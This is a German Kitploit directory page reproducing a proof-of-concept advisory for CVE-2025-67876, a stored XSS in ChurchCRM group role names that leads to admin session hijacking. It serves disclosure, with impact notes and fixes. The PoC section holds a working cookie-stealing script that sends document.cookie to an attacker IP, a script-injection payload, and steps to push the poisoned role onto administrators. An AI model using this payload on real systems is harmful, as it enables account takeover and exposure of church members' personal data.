Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-67876 — Detaillierter Proof-of-Concept für CVE-2025-67876, der gespeichertes XSS in ChurchCRM-Gruppenrollennamen demonstriert, was zur Übernahme von Admin-Sitzungen führt, mit vollständigem Exploitation-Walkthrough und Abhilfeempfehlungen. | Kitploit
Tools/GitHubGitHub/lukasz-rybak/cve-2025-67876
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHublukasz-rybak/cve-2025-67876

CVE-2025-67876

Detaillierter Proof-of-Concept für CVE-2025-67876, der gespeichertes XSS in ChurchCRM-Gruppenrollennamen demonstriert, was zur Übernahme von Admin-Sitzungen führt, mit vollständigem Exploitation-Walkthrough und Abhilfeempfehlungen.

Repository anzeigen
4vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-67876: ChurchCRM hat Stored XSS im Gruppenrollennamen, der zu Admin-Session-Hijacking führt

Übersicht

FeldDetails
CVE-IDCVE-2025-67876
SchweregradKRITISCH
AdvisoryAdvisory ansehen
Entdeckt vonLukasz Rybak

Betroffene Produkte

  • ChurchCRM/CRM

Details

Zusammenfassung

Eine gespeicherte Cross-Site-Scripting (XSS) Schwachstelle existiert in ChurchCRM, die es einem Benutzer mit niedrigen Rechten und der Berechtigung „Manage Groups“ ermöglicht, persistentes JavaScript in Gruppenrollennamen einzuschleusen. Die Nutzlast wird in der Datenbank gespeichert und ausgeführt, sobald ein Benutzer (einschließlich Administratoren) eine Seite aufruft, die diese Rolle anzeigt, wie GroupView.php oder PersonView.php. Dies ermöglicht vollständiges Session-Hijacking und Kontoübernahme.

Details

Die Ursache ist ein Mangel an Eingabevalidierung und Ausgabekodierung bei der Verarbeitung von Gruppenrollennamen.

Beim Bearbeiten einer Gruppe in GroupEditor.php kann der Benutzer die Rollennamen ändern. Die Anwendung bereinigt die Eingabe nicht (z. B. keine strip_tags, htmlspecialchars oder serverseitige Validierung). Der Wert wird in der Datenbanktabelle list_lst gespeichert.

Später wird der gespeicherte Wert ohne Escape direkt in HTML eingefügt:

  • In GroupView.php erscheinen Gruppenrollen in Tabellenzellen, umschlossen von .
  • In PersonView.php werden die zugewiesenen Rollen des Benutzers unter „Zugewiesene Gruppen“ angezeigt. Da keine Escaping angewendet wird, wird jedes in dem Rollennamen gespeicherte HTML oder JavaScript im Browser des Opfers ausgeführt.

Ein Benutzer mit niedrigen Rechten (mit „Manage Groups“) kann daher seine Berechtigungen auf vollständigen Administrator ausweiten, indem er JavaScript in eine Rolle injiziert und diese Rolle einem Administrator zuweist.

PoC

Phase 1 - Angreifer-Setup

Erstellen Sie x.js auf einer vom Angreifer kontrollierten Maschine:

fetch('http://172.20.0.1:8000/log?cookie=' + encodeURIComponent(document.cookie));

Stellen Sie die Datei bereit:

python3 -m http.server 800

Phase 2 - XSS-Payload injizieren

  1. Melden Sie sich als Benutzer mit der Berechtigung „Manage Groups“ an.

    image
  2. Navigieren Sie zu: Gruppen → Gruppen auflisten → eine beliebige Gruppe auswählen → Einstellungen.

  3. Bearbeiten Sie im Abschnitt „Gruppenrollen“ eine vorhandene Rolle oder erstellen Sie eine neue.

  4. Fügen Sie die schädliche Nutzlast ein:

"><script src=//172.20.0.1:800/x.js></script>

image

Klicken Sie in der Gruppenrollenliste auf „Standard“ neben der Rolle, die Ihre injizierte XSS-Nutzlast enthält. Dies stellt sicher, dass die schädliche Rolle automatisch jedem Benutzer zugewiesen wird, der zur Gruppe hinzugefügt wird, und erhöht die Wahrscheinlichkeit, dass ein Administrator das XSS beim Anzeigen seines Profils auslöst. image Klicken Sie neben der vorherigen Standardrolle, normalerweise „Mitglied“, auf „Löschen“. Das Entfernen der sauberen Standardrolle zwingt das System, die mit XSS infizierte Rolle für alle zukünftigen Zuweisungen zu verwenden, und garantiert so die Ausführung, wenn das Opfer eine Seite aufruft, die seine zugewiesene Rolle anzeigt. image

  1. Speichern Sie den Rollennamen. image

Phase 3 - Die schädliche Rolle einem Opfer zuweisen

  1. Gehen Sie zur Gruppenansichtsseite.

  2. Fügen Sie einen beliebigen Benutzer als Gruppenmitglied hinzu (z. B. Church Admin).

    image
  3. Wählen Sie die schädliche Rolle aus dem Dropdown-Menü aus.

  4. Speichern Sie die Zuweisung.

    image

Phase 4 - Ausführung des XSS

Wenn das Opfer (Admin) Folgendes besucht:

  • Ihr Benutzerprofil: PersonView.php

    image
  • Die Gruppenansichtsseite: GroupView.php

Das gespeicherte JavaScript wird sofort ausgeführt.

Auf dem Angreifer-Server erscheinen eingehende Anfragen: image

image

Dies bestätigt die erfolgreiche Kontoübernahme.

Auswirkungen

  • Stored XSS
  • Vollständiges Administrator-Session-Hijacking
  • Privilegieneskalation von einem Benutzer mit niedrigen Rechten zum vollständigen Systemadministrator
  • Offenlegung aller in ChurchCRM gespeicherten sensiblen personenbezogenen Daten

CWE

CWE-79: Unzureichende Neutralisierung von Eingaben bei der Generierung von Webseiten („Cross-Site Scripting“)

Empfehlung

  • Implementieren Sie eine Ausgabekodierung (htmlspecialchars) für alle Darstellungen von Rollennamen.
  • Validieren und bereinigen Sie Rollennamen serverseitig.
  • Überprüfen Sie andere listenbasierte bearbeitbare Felder auf ähnliche Schwachstellen.
  • Erwägen Sie die Verwendung einer zentralen Escaping-Bibliothek oder einer Vorlagen-Engine.

Referenzen

  • https://github.com/ChurchCRM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh

Haftungsausschluss

Diese CVE wurde verantwortungsvoll im Rahmen koordinierter Offenlegungspraktiken für Schwachstellen offengelegt. Die hier bereitgestellten Informationen dienen ausschließlich zu Bildungs- und Verteidigungszwecken.

Tool herunterladen